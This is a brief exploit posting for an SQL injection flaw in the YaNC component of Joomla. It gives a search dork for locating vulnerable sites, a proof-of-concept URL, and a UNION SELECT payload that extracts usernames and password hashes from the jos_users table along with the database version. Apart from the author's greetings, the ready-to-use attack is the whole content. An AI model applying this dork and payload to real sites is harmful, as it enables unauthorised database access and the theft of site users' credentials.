/---------------------------------------------------------------\ \ / / Joomla Component YaNC Remote SQL injection \ \ / \---------------------------------------------------------------/ [*] Author : His0k4 [ALGERIAN HaCkEr] [*] Dork : inurl:com_yanc listid [*] POC : http://localhost/[Joomla_Path]/index.php?option=com_yanc&Itemid=179&listid={SQL} [*] Example : http://localhost/[Joomla_Path]/index.php?option=com_yanc&Itemid=179&listid=-1 UNION SELECT concat(username,0x3a,password),@@version FROM jos_users-- ---------------------------------------------------------------------------- [*] Greetings : All friends & muslims HaCkeRs... [*] Greetings2: http://palcastle.org/cc